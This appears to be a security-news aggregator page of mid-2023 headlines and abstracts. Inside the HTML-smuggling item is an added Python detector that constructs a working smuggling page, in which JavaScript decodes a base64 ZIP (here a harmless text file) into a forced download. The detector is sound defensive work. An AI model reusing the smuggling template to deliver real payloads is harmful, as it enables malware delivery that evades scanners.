335,923 out of 489,337 Fortinet firewalls vulnerable to CVE-2023-27997 Full Text
Abstract
Researchers reported that roughly 490,000 Fortinet firewalls expose SSL VPN interfaces on the internet, and about 69% of them are still vulnerable to CVE-2023-27997. In mid-June Fortinet addressed a critical flaw, tracked as CVE-2023-27997...Security Affairs
July 4, 2023 – Criminals
Anonymous Sudan Claims to Have Stolen 30 Million Microsoft’s Customer Accounts Full Text
Abstract
Attackers said “We announce that we have successfully hacked Microsoft and have access to a large database containing more than 30 million Microsoft accounts, email and password. Price for full database : 50,000 USD.”Cyware
July 4, 2023 – General
Report: Fileless Attacks Increase by 1,400% Full Text
Abstract
Protecting runtime environments requires at least a monitoring approach that includes scanning for known malicious files and network communications, then blocking them and alerting when they appear. However, this is still insufficient.Cyware
July 3, 2023 – Attack
GCHQ reveals British government was hacked by foreign cyber spies 20 years ago Full Text
Abstract
This month marks the 20th anniversary of the first time cyber experts at GCHQ responded to a foreign state hacking the British government, the intelligence and security agency revealed on Friday.Cyware
July 03, 2023 – Hacker
Chinese Hackers Use HTML Smuggling to Infiltrate European Ministries with PlugX Full Text
Abstract
A Chinese nation-state group has been observed targeting Foreign Affairs ministries and embassies in Europe using HTML smuggling techniques to deliver the PlugX remote access trojan on compromised systems. Cybersecurity firm Check Point said the activity, dubbed SmugX, has been ongoing since at least December 2022. "The campaign uses new delivery methods to deploy (most notably – HTML Smuggling) a new variant of PlugX, an implant commonly associated with a wide variety of Chinese threat actors," Check Point said. "Although the payload itself remains similar to the one found in older PlugX variants, its delivery methods result in low detection rates, which until recently helped the campaign fly under the radar." The exact identity of the threat actor behind the operation is a little hazy, although existing clues point in the direction of Mustang Panda, which also shares overlaps with clusters tracked as Earth Preta, RedDelta, and Check Point's own dThe Hacker News
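HTML smuggling gets its low detection rate from the fact that the HTML file on the wire contains no recognisable executable, only a base64 string that the browser decodes and hands to the user as a download. A mail or proxy scanner can undo that trick statically: find long base64 runs, decode them, and check for an archive or executable header next to the JavaScript that assembles a Blob. The detector below is an added example for this page, not Check Point's code; the smuggling page it inspects is constructed in the script (the embedded ZIP holds a harmless text file) and so is the benign comparison page with an inline PNG.

```python
"""Static check for HTML smuggling: base64 payload plus client-side Blob download.

Added example, not Check Point's code. The sample pages are constructed here so
the script runs offline; the suspicious one carries a harmless ZIP.
"""
import base64
import io
import re
import zipfile

# JavaScript idioms that turn an embedded string into a file download.
INDICATORS = ("atob(", "new Blob(", "createObjectURL(", "msSaveOrOpenBlob", ".download", "Uint8Array(")
# Headers of file types that have no business being decoded inside a web page.
MAGIC = {b"PK\x03\x04": "zip", b"MZ": "pe", b"%PDF": "pdf", b"\xd0\xcf\x11\xe0": "ole"}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")   # 200 chars ~ 150 bytes; assumed floor


def analyze_html(html: str) -> dict:
    """Return indicator hits, decoded payload summaries and an overall verdict."""
    hits = [ind for ind in INDICATORS if ind in html]
    payloads = []
    for m in B64_RUN.finditer(html):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:          # binascii.Error subclasses ValueError: not real base64
            continue
        kind = next((name for magic, name in MAGIC.items() if raw.startswith(magic)), None)
        payloads.append({"offset": m.start(), "size": len(raw), "type": kind})
    # Verdict needs both halves: assembly code in the page and a decodable binary blob.
    suspicious = len(hits) >= 2 and any(p["type"] is not None for p in payloads)
    return {"indicators": hits, "payloads": payloads, "suspicious": suspicious}


def build_smuggling_sample() -> str:
    """Constructed smuggling page: ZIP -> base64 -> atob -> Blob -> forced download."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("lure.txt", "constructed placeholder content " * 8)
    b64 = base64.b64encode(buf.getvalue()).decode()
    return f"""<html><body><script>
var b64 = "{b64}";
var bin = atob(b64); var arr = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) arr[i] = bin.charCodeAt(i);
var blob = new Blob([arr], {{type: 'application/octet-stream'}});
var a = document.createElement('a'); a.href = URL.createObjectURL(blob);
a.download = 'Document.zip'; a.click();
</script></body></html>"""


def build_benign_sample() -> str:
    """Constructed benign page: a long base64 run that is just an inline PNG."""
    png = base64.b64encode(b"\x89PNG\r\n\x1a\n" + b"\x00" * 300).decode()
    return f'<html><body><img src="data:image/png;base64,{png}"></body></html>'


if __name__ == "__main__":
    for label, page in (("smuggling", build_smuggling_sample()), ("benign", build_benign_sample())):
        r = analyze_html(page)
        print(f"{label}: suspicious={r['suspicious']} indicators={r['indicators']} payloads={r['payloads']}")
```

Requiring both the assembly idioms and a decoded executable or archive header keeps ordinary pages with inline images or fonts out of the alert queue; campaigns that split or lightly obfuscate the base64 string defeat the single-run regex, which is why this belongs alongside sandbox detonation rather than in place of it.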
July 3, 2023 – Breach
Anonymous Sudan claims to have stolen 30 million Microsoft’s customer accounts Full Text
Abstract
Microsoft denied the data breach after the collective of hacktivists known as Anonymous Sudan claimed to have hacked the company. In early June, Microsoft suffered severe outages for some of its services, including Outlook email, OneDrive file-sharing...Security Affairs
July 3, 2023 – Attack
Hacks targeting British exam boards raise fears of students cheating Full Text
Abstract
Police in Britain are investigating multiple incidents in which national exam papers for school-leavers were stolen by hackers and sold online to students seeking to cheat on their tests.Cyware
July 03, 2023 – Solution
Improve Your Security WordPress Spam Protection With CleanTalk Anti-Spam Full Text
Abstract
Every website owner or webmaster grapples with the issue of spam on their website forms. The volume of spam can be so overwhelming that finding useful information within it becomes quite challenging. What exacerbates this issue is that spam can populate your public pages, appearing in comments and reviews. You likely understand how this can damage your website's reputation, affect search results, overload your web server, and divert your focus from website development. Website owners and webmasters need a solution to this problem. When selecting an anti-spam solution, the following requirements should be taken into account: The solution must operate automatically, eliminating the need for manual spam checks. It should provide a quick and efficient method of accuracy control. It must be universal, protecting all website forms simultaneously. It should be easy and straightforward to install and set up. It should not require any extra steps from your visitors, ensuring they doThe Hacker News
July 3, 2023
SmugX: Chinese APT uses HTML smuggling to target European Ministries and embassies Full Text
Abstract
A China-linked APT group was observed using HTML smuggling in attacks against Foreign Affairs ministries and embassies in Europe...Security Affairs
July 3, 2023 – Breach
Ireland: Dublin Airport staff pay data hit by criminals Full Text
Abstract
Pay and benefits details of Dublin Airport staff were compromised in a cyberattack on professional service provider Aon, highlighting the exposure created by supply chain attacks.Cyware
July 03, 2023 – Government
CISA Flags 8 Actively Exploited Flaws in Samsung and D-Link Devices Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added eight flaws to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. This includes six shortcomings affecting Samsung smartphones and two vulnerabilities impacting D-Link devices. All the flaws have been patched as of 2021.
CVE-2021-25394 (CVSS score: 6.4) - Samsung mobile devices race condition vulnerability
CVE-2021-25395 (CVSS score: 6.4) - Samsung mobile devices race condition vulnerability
CVE-2021-25371 (CVSS score: 6.7) - An unspecified vulnerability in the DSP driver used in Samsung mobile devices that allows loading of arbitrary ELF libraries
CVE-2021-25372 (CVSS score: 6.7) - Samsung mobile devices improper boundary check within the DSP driver
CVE-2021-25487 (CVSS score: 7.8) - Samsung mobile devices out-of-bounds read vulnerability leading to arbitrary code execution
CVE-2021-25489 (CVSS score: 5.5) - SamsungThe Hacker News
July 3, 2023 – Education
The Impacts of Data Loss on Your Organization Full Text
Abstract
What are the causes of data loss and what is their impact on your organization? In today's digital age, data has become the lifeblood of organizations, driving critical decision-making, improving operational efficiency, and allowing for smoother...Security Affairs
July 3, 2023 – Attack
GuLoader Campaign Targets Law Firms in the US Full Text
Abstract
The GuLoader malware campaign utilizes a multi-stage infection chain, including a PDF lure, a GuLoader VBScript, and obfuscated Powershell scripts, to deliver the Remcos RAT.Cyware
July 03, 2023 – Malware
Evasive Meduza Stealer Targets 19 Password Managers and 76 Crypto Wallets Full Text
Abstract
In yet another sign of a lucrative crimeware-as-a-service (CaaS) ecosystem, cybersecurity researchers have discovered a new Windows-based information stealer called Meduza Stealer that's actively being developed by its author to evade detection by software solutions. "The Meduza Stealer has a singular objective: comprehensive data theft," Uptycs said in a new report. "It pilfers users' browsing activities, extracting a wide array of browser-related data." "From critical login credentials to the valuable record of browsing history and meticulously curated bookmarks, no digital artifact is safe. Even crypto wallet extensions, password managers, and 2FA extensions are vulnerable." Despite the similarity in features, Meduza boasts of a "crafty" operational design that eschews the use of obfuscation techniques and promptly terminates its execution on compromised hosts should a connection to the attacker's server fail. It'sThe Hacker News
July 3, 2023 – Government
CISA adds Samsung and D-link bugs to its Known Exploited Vulnerabilities catalog Full Text
Abstract
US CISA added six actively exploited Samsung vulnerabilities and two D-Link vulnerabilities to its Known Exploited Vulnerabilities catalog...Security Affairs
July 3, 2023 – Phishing
Torrent of image-based phishing emails are harder to detect and more convincing Full Text
Abstract
Phishing mongers have released a torrent of image-based junk emails that embed QR codes into their bodies to successfully bypass security protections and provide a level of customization to more easily fool recipients, researchers said.Cyware
July 03, 2023 – Criminals
BlackCat Operators Distributing Ransomware Disguised as WinSCP via Malvertising Full Text
Abstract
Threat actors associated with the BlackCat ransomware have been observed employing malvertising tricks to distribute rogue installers of the WinSCP file transfer application. "Malicious actors used malvertising to distribute a piece of malware via cloned webpages of legitimate organizations," Trend Micro researchers said in an analysis published last week. "In this case, the distribution involved a webpage of the well-known application WinSCP, an open-source Windows application for file transfer." Malvertising refers to the use of SEO poisoning techniques to spread malware via online advertising. It typically involves hijacking a chosen set of keywords to display bogus ads on Bing and Google search results pages with the goal of redirecting unsuspecting users to sketchy pages. The idea is to trick users searching for applications like WinSCP into downloading malware, in this instance, a backdoor that contains a Cobalt Strike Beacon that connects to aThe Hacker News
July 3, 2023 – Malware
New Windows Meduza Stealer targets tens of crypto wallets and password managers Full Text
Abstract
Researchers spotted a new Windows information stealer called Meduza Stealer, whose authors employ sophisticated marketing strategies to promote it. The Meduza Stealer can steal browsing activities and extract a wide array of browser-related data, including...Security Affairs
July 3, 2023 – Breach
HHS Says At Least 100,000 People’s Data Exposed After Hacks at Government Contractors Full Text
Abstract
While no HHS systems or networks were compromised, attackers gained access to HHS data by exploiting the vulnerability in the MOVEit software used by third-party vendors, the official said.Cyware
July 3, 2023 – Malware
Experts detected a new variant of North Korea-linked RUSTBUCKET macOS malware Full Text
Abstract
Researchers from Elastic Security Labs have spotted a new variant of the RustBucket Apple macOS malware with enhanced capabilities. In April, the security firm...Security Affairs
July 3, 2023 – General
One third of security breaches go unnoticed by security professionals Full Text
Abstract
94% of global respondents believe their hybrid cloud security offers full visibility into IT infrastructure, yet almost one-third of security breaches go undetected by IT pros, according to a Gigamon report.Cyware
July 2, 2023 – General
Security Affairs newsletter Round 426 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. WordPress...Security Affairs
July 2, 2023 – Attack
WordPress sites using the Ultimate Member plugin are under attack Full Text
Abstract
Threat actors are actively exploiting a critical unpatched WordPress zero-day in the Ultimate Member plugin, tracked as CVE-2023-3460 (CVSS score: 9.8), to create secret admin accounts...Security Affairs
July 1, 2023 – Vulnerabilities
200,000 WordPress Sites Exposed to Attacks Exploiting Flaw in ‘Ultimate Member’ Plugin Full Text
Abstract
Tracked as CVE-2023-3460 (CVSS score of 9.8), the recently identified security defect in Ultimate Member plugin allows attackers to add a new user account to the administrators group.Cyware
July 01, 2023 – Vulnerabilities
Hackers Exploiting Unpatched WordPress Plugin Flaw to Create Secret Admin Accounts Full Text
Abstract
As many as 200,000 WordPress websites are at risk of ongoing attacks exploiting a critical unpatched security vulnerability in the Ultimate Member plugin. The flaw, tracked as CVE-2023-3460 (CVSS score: 9.8), impacts all versions of the Ultimate Member plugin, including the latest version (2.6.6) that was released on June 29, 2023. Ultimate Member is a popular plugin that facilitates the creation of user-profiles and communities on WordPress sites. It also provides account management features. "This is a very serious issue: unauthenticated attackers may exploit this vulnerability to create new user accounts with administrative privileges, giving them the power to take complete control of affected sites," WordPress security firm WPScan said in an alert. Although details about the flaw have been withheld due to active abuse, it stems from an inadequate blocklist logic put in place to alter the wp_capabilities user meta value of a new user to that of an administrator aThe Hacker News
July 1, 2023 – Breach
More than 16 million people and counting have had data exposed in MOVEit breaches Full Text
Abstract
Since June 1, experts have warned of the vulnerability affecting the popular file transfer software, and dozens of the biggest organizations in the U.S. and Europe have since come forward to reveal that they were affected by the situation.Cyware
July 01, 2023 – Malware
Beware: New ‘RustBucket’ Malware Variant Targeting macOS Users Full Text
Abstract
Researchers have pulled back the curtain on an updated version of an Apple macOS malware called RustBucket that comes with improved capabilities to establish persistence and avoid detection by security software. "This variant of RustBucket, a malware family that targets macOS systems, adds persistence capabilities not previously observed," Elastic Security Labs researchers said in a report published this week, adding it's "leveraging a dynamic network infrastructure methodology for command-and-control." RustBucket is the work of a North Korean threat actor known as BlueNoroff, which is part of a larger intrusion set tracked under the name Lazarus Group, an elite hacking unit supervised by the Reconnaissance General Bureau (RGB), the country's primary intelligence agency. The malware came to light in April 2023, when Jamf Threat Labs described it as an AppleScript-based backdoor capable of retrieving a second-stage payload from a remote server. ElasThe Hacker News
July 1, 2023 – Breach
Update: 1.1 Million NHS Patients’ Data Also Breached in the University of Manchester Attack Full Text
Abstract
The compromised NHS data includes records of major trauma patients across England and individuals treated after terror attacks, which the university collected for research purposes, according to media outlet The Independent on Thursday.Cyware
July 1, 2023 – Criminals
LockBit gang demands a $70 million ransom to the semiconductor manufacturing giant TSMC Full Text
Abstract
The LockBit ransomware gang claims to have hacked Taiwan Semiconductor Manufacturing Company (TSMC). The LockBit ransomware group this week claimed to have hacked the Taiwan Semiconductor Manufacturing Company (TSMC) and demanded a $70 million ransom. TSMC...Security Affairs
July 1, 2023 – Outage
Hackers claim to take down Russian satellite communications provider Full Text
Abstract
A group of previously unknown hackers has claimed responsibility for a cyberattack on the Russian satellite communications provider Dozor-Teleport, which is used by energy companies and the country's defense and security services.Cyware
July 1, 2023 – Ransomware
Avast released a free decryptor for the Windows version of the Akira ransomware Full Text
Abstract
Avast released a free decryptor for the Akira ransomware that can allow victims to recover their data without paying the ransom. Cybersecurity firm Avast released a free decryptor for the Akira ransomware that can allow victims to recover their data...Security Affairs
July 1, 2023 – Phishing
Malvertising Used as Entry Vector for BlackCat, Actors Also Leverage SpyBoy Terminator Full Text
Abstract
The infection chain started with a malicious ad for the WinSCP application displayed in search engine results. Users who clicked on the ad were redirected to a cloned download webpage where they unknowingly downloaded a malware-infected ISO file.Cyware
June 30, 2023 – General
Japan Threat Landscape Takes on Global Significance Full Text
Abstract
The primary cause of cyberattacks against Japanese computer systems is the strength and quality of its manufacturing base. The size of Japanese manufacturers makes them an attractive target for criminal extortion.Cyware
June 30, 2023 – Hacker
Iranian Hackers Charming Kitten Utilize POWERSTAR Backdoor in Targeted Espionage Attacks Full Text
Abstract
Charming Kitten, the nation-state actor affiliated with Iran's Islamic Revolutionary Guard Corps (IRGC), has been attributed to a bespoke spear-phishing campaign that delivers an updated version of a fully-featured PowerShell backdoor called POWERSTAR. "There have been improved operational security measures placed in the malware to make it more difficult to analyze and collect intelligence," Volexity researchers Ankur Saini and Charlie Gardner said in a report published this week. The threat actor is something of an expert when it comes to employing social engineering to lure targets, often crafting tailored fake personas on social media platforms and engaging in sustained conversations to build rapport before sending a malicious link. It's also tracked under the names APT35, Cobalt Illusion, Mint Sandstorm (formerly Phosphorus), and Yellow Garuda. Recent intrusions orchestrated by Charming Kitten have made use of other implants such as PowerLess and BellaCiaoThe Hacker News
June 30, 2023
Iran-linked Charming Kitten APT enhanced its POWERSTAR Backdoor Full Text
Abstract
Iran-linked Charming Kitten group used an updated version of the PowerShell backdoor called POWERSTAR in a spear-phishing campaign. Security firm Volexity observed the Iran-linked Charming Kitten (aka APT35, Phosphorus, Newscaster, and Ajax Security Team)...Security Affairs
June 30, 2023 – General
3 Reasons SaaS Security is the Imperative First Step to Ensuring Secure AI Usage Full Text
Abstract
In today's fast-paced digital landscape, the widespread adoption of AI (Artificial Intelligence) tools is transforming the way organizations operate. From chatbots to generative AI models, these SaaS-based applications offer numerous benefits, from enhanced productivity to improved decision-making. Employees using AI tools experience the advantages of quick answers and accurate results, enabling them to perform their jobs more effectively and efficiently. This popularity is reflected in the staggering numbers associated with AI tools. OpenAI's viral chatbot, ChatGPT, has amassed approximately 100 million users worldwide, while other generative AI tools like DALL·E and Bard have also gained significant traction for their ability to generate impressive content effortlessly. The generative AI market is projected to exceed $22 billion by 2025, indicating the growing reliance on AI technologies. However, amidst the enthusiasm surrounding AI adoption, it is imperative to addressThe Hacker News
June 30, 2023 – Vulnerabilities
miniOrange’s WordPress Social Login and Register plugin was affected by a critical auth bypass bug Full Text
Abstract
A critical authentication bypass flaw in miniOrange’s WordPress Social Login and Register plugin, can allow gaining access to any account on a site. Wordfence researchers discovered an authentication bypass vulnerability in miniOrange’s WordPress...Security Affairs
June 30, 2023 – Solution
WhatsApp Upgrades Proxy Feature Against Internet Shutdowns Full Text
Abstract
Meta's WhatsApp has rolled out updates to its proxy feature, allowing more flexibility in the kind of content that can be shared in conversations. This includes the ability to send and receive images, voice notes, files, stickers and GIFs, WhatsApp told The Hacker News. The new features were first reported by BBC Persian. Some of the other improvements include streamlined steps to simplify the setup process as well as the introduction of shareable links to "share functioning/valid proxy addresses to their contacts for easy and automatic installation." Support for proxy servers was officially launched by the messaging service earlier this January, thereby helping users circumvent government-imposed censorship and internet shutdowns and obtain indirect access to WhatsApp. The company has also made available a reference implementation for setting up a proxy server with ports 80, 443 or 5222 available and a domain name that points to the server's IP address. The Hacker News
June 30, 2023
North Korea-linked Andariel APT used a new malware named EarlyRat last year Full Text
Abstract
North Korea-linked cyberespionage group Andariel used a previously undocumented malware called EarlyRat. Kaspersky researchers reported that the North Korea-linked APT group Andariel used a previously undocumented malware dubbed EarlyRat in...Security Affairs
June 30, 2023 – Criminals
Cybercriminals Hijacking Vulnerable SSH Servers in New Proxyjacking Campaign Full Text
Abstract
An active financially motivated campaign is targeting vulnerable SSH servers to covertly ensnare them into a proxy network. "This is an active campaign in which the attacker leverages SSH for remote access, running malicious scripts that stealthily enlist victim servers into a peer-to-peer (P2P) proxy network, such as Peer2Profit or Honeygain," Akamai researcher Allen West said in a Thursday report. Unlike cryptojacking, in which a compromised system's resources are used to illicitly mine cryptocurrency, proxyjacking offers the ability for threat actors to leverage the victim's unused bandwidth to covertly run different services as a P2P node. This offers two-fold benefits: It not only enables the attacker to monetize the extra bandwidth with a significantly reduced resource load that would be necessary to carry out cryptojacking, it also reduces the chances of discovery. "It is a stealthier alternative to cryptojacking and has serious implications that caThe Hacker News
June 30, 2023 – General
MITRE Unveils Top 25 Most Dangerous Software Weaknesses of 2023: Are You at Risk? Full Text
Abstract
MITRE has released its annual list of the Top 25 "most dangerous software weaknesses" for the year 2023. "These weaknesses lead to serious vulnerabilities in software," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said. "An attacker can often exploit these vulnerabilities to take control of an affected system, steal data, or prevent applications from working." The list is based on an analysis of public vulnerability data in the National Vulnerability Database (NVD) for root cause mappings to CWE weaknesses for the previous two years. A total of 43,996 CVE entries were examined and a score was attached to each of them based on prevalence and severity. Coming out top is Out-of-bounds Write, followed by Cross-site Scripting, SQL Injection, Use After Free, OS Command Injection, Improper Input Validation, Out-of-bounds Read, Path Traversal, Cross-Site Request Forgery (CSRF), and Unrestricted Upload of File with Dangerous Type. Out-ofThe Hacker News
June 29, 2023 – Attack
8Base Ransomware Activity Spikes, Researchers Warn Full Text
Abstract
Ransomware threat 8Base has been conducting double extortion attacks for over a year and its activities spiked suddenly in May and June 2023. 8Base has been connected to 67 attacks by Malwarebytes and NCC Group. Approximately 50% of the targeted victims belong to the business services, manufacturin...Cyware
June 29, 2023 – Hacker
From MuddyC3 to PhonyC2: Iran’s MuddyWater Evolves with a New Cyber Weapon Full Text
Abstract
The Iranian state-sponsored group dubbed MuddyWater has been attributed to a previously unseen command-and-control (C2) framework called PhonyC2 that's been put to use by the actor since 2021. Evidence shows that the custom made, actively developed framework has been leveraged in the February 2023 attack on Technion, an Israeli research institute, cybersecurity firm Deep Instinct said in a report shared with The Hacker News. What's more, additional links have been unearthed between the Python 3-based program and other attacks carried out by MuddyWater, including the ongoing exploitation of PaperCut servers. "It is structurally and functionally similar to MuddyC3, a previous MuddyWater custom C2 framework that was written in Python 2," security researcher Simon Kenin said. "MuddyWater is continuously updating the PhonyC2 framework and changing TTPs to avoid detection." MuddyWater, also known as Mango Sandstorm (previously Mercury), is a cyberThe Hacker News
June 29, 2023 – Breach
The phone monitoring app LetMeSpy disclosed a data breach Full Text
Abstract
Android app LetMeSpy disclosed a security breach; sensitive data associated with thousands of Android users was exposed. The phone monitoring app LetMeSpy disclosed a security breach, threat actors have stolen sensitive data associated with thousands...Security Affairs
June 29, 2023 – Government
European Cyber Agency Remains Underfunded Full Text
Abstract
There are multiple discrepancies in how the European Commission allocates funds to the cyber agency, Juhan Lepassaar, the executive director of the EU Agency for Cybersecurity, said during a Tuesday parliamentary hearing evaluating allocated budgets.Cyware
June 29, 2023 – Malware
Fluhorse: Flutter-Based Android Malware Targets Credit Cards and 2FA Codes Full Text
Abstract
Cybersecurity researchers have shared the inner workings of an Android malware family called Fluhorse. The malware "represents a significant shift as it incorporates the malicious components directly within the Flutter code," Fortinet FortiGuard Labs researcher Axelle Apvrille said in a report published last week. Fluhorse was first documented by Check Point in early May 2023, detailing its attacks on users located in East Asia through rogue apps masquerading as ETC and VPBank Neo, which are popular in Taiwan and Vietnam. The initial intrusion vector for the malware is phishing. The ultimate goal of the app is to steal credentials, credit card details, and two-factor authentication (2FA) codes received as SMS to a remote server under the control of the threat actors. The latest findings from Fortinet, which reverse-engineered a Fluhorse sample uploaded to VirusTotal on June 11, 2023, suggest that the malware has evolved, incorporating additional sophistication bThe Hacker News
June 29, 2023 – Malware
Previously undetected ThirdEye malware appears in the threat landscape Full Text
Abstract
A new Windows information stealer dubbed ThirdEye appeared in the threat landscape; it has been active since April. Fortinet FortiGuard Labs discovered a previously undetected information stealer named ThirdEye. The malicious code is not sophisticated...Security Affairs
June 29, 2023 – Vulnerabilities
Details Disclosed for Critical SAP Vulnerabilities, Including Wormable Exploit Chain Full Text
Abstract
The vulnerabilities are tracked as CVE-2021-27610, CVE-2021-33677, CVE-2021-33684, and CVE-2023-0014, and they impact products that use the SAP Application Server for ABAP component.Cyware
June 29, 2023 – Solution
The Right Way to Enhance CTI with AI (Hint: It’s the Data) Full Text
Abstract
Cyber threat intelligence is an effective weapon in the ongoing battle to protect digital assets and infrastructure - especially when combined with AI. But AI is only as good as the data feeding it. Access to unique, underground sources is key. Threat Intelligence offers tremendous value to people and companies. At the same time, its ability to address organizations' cybersecurity needs and the benefits it offers vary by company, industry, and other factors. A common challenge with cyber threat intelligence (CTI) is that the data it produces can be vast and overwhelming, creating confusion and inefficiencies among security teams' threat exposure management efforts. Additionally, organizations have different levels of security maturity, which can make access to and understanding of CTI data difficult. Enter generative AI. Many cybersecurity companies – and more specifically, threat intelligence companies – are bringing generative AI to market to simplify threat intelligence aThe Hacker News
June 29, 2023 – Criminals
Former Group-IB manager has been arrested in Kazakhstan Full Text
Abstract
The former head of network security at Group-IB has been arrested in Kazakhstan based on a request from U.S. law enforcement. Nikita Kislitsin who worked as the head of network security at Group-IB, as well as its Russian-based spinoff company (known...Security Affairs
June 29, 2023 – General
Saudi Arabia’s Cyber Capabilities Ranked Second Globally Full Text
Abstract
According to the IIMD, the development of a National Cybersecurity Authority (NCA) and the planned development of a Global Cybersecurity Forum institute in the country have both affirmed Saudi Arabia's role in the field of cybersecurity.Cyware
June 29, 2023 – Hacker
North Korean Hacker Group Andariel Strikes with New EarlyRat Malware Full Text
Abstract
The North Korea-aligned threat actor known as Andariel leveraged a previously undocumented malware called EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year. "Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the command-and-control (C2) server," Kaspersky said in a new report. Also called Silent Chollima and Stonefly, Andariel is associated with North Korea's Lab 110, a primary hacking unit that also houses APT38 (aka BlueNoroff) and other subordinate elements collectively tracked under the umbrella name Lazarus Group. The threat actor, besides conducting espionage attacks against foreign government and military entities that are of strategic interest, is known to carry out cyber crime as an extra source of income to the sanctions-hit nation. Some of the key cyber weapons in its arsenal include a ransomware strain referred to as Maui and numerous remote access trojans and backdThe Hacker News
June 29, 2023 – Vulnerabilities
Experts published PoC exploits for Arcserve UDP authentication bypass issue Full Text
Abstract
Data protection firm Arcserve addressed an authentication bypass vulnerability in its Unified Data Protection (UDP) backup software. Data protection vendor Arcserve addressed a high-severity authentication bypass flaw, tracked as CVE-2023-26258, in its Unified...Security Affairs
June 29, 2023 – Government
Cyber Command to expand ‘canary in the coal mine’ unit working with private sector Full Text
Abstract
U.S. Cyber Command is doubling the size of a little-known program that serves as one of the military's chief links to private industry in order to bolster the country’s defenses against cyber threats.Cyware
June 29, 2023 – Breach
Android Spy App LetMeSpy Suffers Major Data Breach, Exposing Users’ Personal Data Full Text
Abstract
Android-based phone monitoring app LetMeSpy has disclosed a security breach that allowed an unauthorized third-party to steal sensitive data associated with thousands of Android users. "As a result of the attack, the criminals gained access to email addresses, telephone numbers and the content of messages collected on accounts," LetMeSpy said in an announcement on its website, noting the incident took place on June 21, 2023. Following the discovery of the hack, LetMeSpy said it notified law enforcement and data protection authorities. It's also taking steps to suspend all account-related functions until further notice. The identity of the threat actor and their motives are currently unknown. The work of a Polish company named Radeal, LetMeSpy is offered as a monthly subscription ($6 for Standard or $12 for Pro), allowing its customers to snoop on others simply by installing the software on their devices. An Internet Archive snapshot from December 2013 shows that iThe Hacker News
June 29, 2023 – Hacker
Manic Menagerie 2.0: The Evolution of a Highly Motivated Threat Actor Full Text
Abstract
The threat actor used a variety of tactics, techniques, and tools to evade detection and maintain access to the compromised networks, including deploying web shells, exploiting vulnerabilities, and attempting local privilege escalation.Cyware
June 29, 2023 – Vulnerabilities
Critical Security Flaw in Social Login Plugin for WordPress Exposes Users’ Accounts Full Text
Abstract
A critical security flaw has been disclosed in miniOrange's Social Login and Register plugin for WordPress that could enable a malicious actor to log in as any user, provided the user's email address is already known. Tracked as CVE-2023-2982 (CVSS score: 9.8), the authentication bypass flaw impacts all versions of the plugin, including and prior to 7.6.4. It was addressed on June 14, 2023, with the release of version 7.6.5 following responsible disclosure on June 2, 2023. "The vulnerability makes it possible for an unauthenticated attacker to gain access to any account on a site including accounts used to administer the site, if the attacker knows, or can find, the associated email address," Wordfence researcher István Márton said. The issue is rooted in the fact that the encryption key used to secure the information during login using social media accounts is hard-coded, thus leading to a scenario where attackers could create a valid request with a properlThe Hacker News
June 29, 2023 – Ransomware
Dark Power Ransomware on the Ascent – A Technical Insight into 2023’s Latest Ransomware Strain Full Text
Abstract
Dark Power is a highly advanced ransomware strain that uses advanced encryption techniques and targets various industries globally. It stops critical system services and processes, encrypts files, and drops a ransom note with payment instructions.Cyware
June 29, 2023 – Malware
Newly Uncovered ThirdEye Windows-Based Malware Steals Sensitive Data Full Text
Abstract
A previously undocumented Windows-based information stealer called ThirdEye has been discovered in the wild with capabilities to harvest sensitive data from infected hosts. Fortinet FortiGuard Labs, which made the discovery, said it found the malware in an executable that masqueraded as a PDF file with a Russian name "CMK Правила оформления больничных листов.pdf.exe," which translates to "CMK Rules for issuing sick leaves.pdf.exe." The arrival vector for the malware is presently unknown, although the nature of the lure points to it being used in a phishing campaign. The very first ThirdEye sample was uploaded to VirusTotal on April 4, 2023, with relatively fewer features. The evolving stealer, like other malware families of its kind, is equipped to gather system metadata, including BIOS release date and vendor, total/free disk space on the C drive, currently running processes, registered usernames, and volume information. The amassed details are then traThe Hacker News
June 29, 2023 – Criminals
Security analyst wanted by both Russia and the US Full Text
Abstract
A Russian network security specialist and former editor of Hacker magazine who is wanted by the US and Russia on cybercrime charges has been detained in Kazakhstan as the two governments seek his extradition.Cyware
June 29, 2023 – Breach
US Patent and Trademark Office Notifies Filers of Years-Long Data Leak Full Text
Abstract
The U.S. Patent and Trademark Office (USPTO) said in a notice sent to affected trademark applicants that their private domicile address — often their home address — inadvertently appeared in public records between February 2020 and March 2023.Cyware
June 28, 2023 – Solution
Microsoft Sysmon now detects when executable files are created Full Text
Abstract
Microsoft has released Sysmon 15, converting it into a protected process and adding the new 'FileExecutableDetected' option to log when executable files are created.BleepingComputer
June 28, 2023 – Malware
Infectious NPM and PyPI Packages Raise Fresh Supply Chain Concerns Full Text
Abstract
Security researchers have laid bare an ongoing attack campaign that specifically targets the npm ecosystem via a pair of malicious packages. Meanwhile, another researcher group reported seven malicious PyPI packages. Developers, package maintainers, and users must remain diligent in verifying the i...Cyware
June 28, 2023 – Vulnerabilities
Alert: New Electromagnetic Attacks on Drones Could Let Attackers Take Control Full Text
Abstract
Drones that don't have any known security weaknesses could be the target of electromagnetic fault injection (EMFI) attacks, potentially enabling a threat actor to achieve arbitrary code execution and compromise their functionality and safety. The research comes from IOActive, which found that it is "feasible to compromise the targeted device by injecting a specific EM glitch at the right time during a firmware update." "This would allow an attacker to gain code execution on the main processor, gaining access to the Android OS that implements the core functionality of the drone," Gabriel Gonzalez, director of hardware security at the company, said in a report published this month. The study, which was undertaken to determine the current security posture of Unmanned Aerial Vehicles (UAVs), was carried out on Mavic Pro, a popular quadcopter drone manufactured by DJI that employs various security features like signed and encrypted firmware, Trusted ExecutiThe Hacker News
June 28, 2023 – Attack
Using Electromagnetic Fault Injection Attacks to take over drones Full Text
Abstract
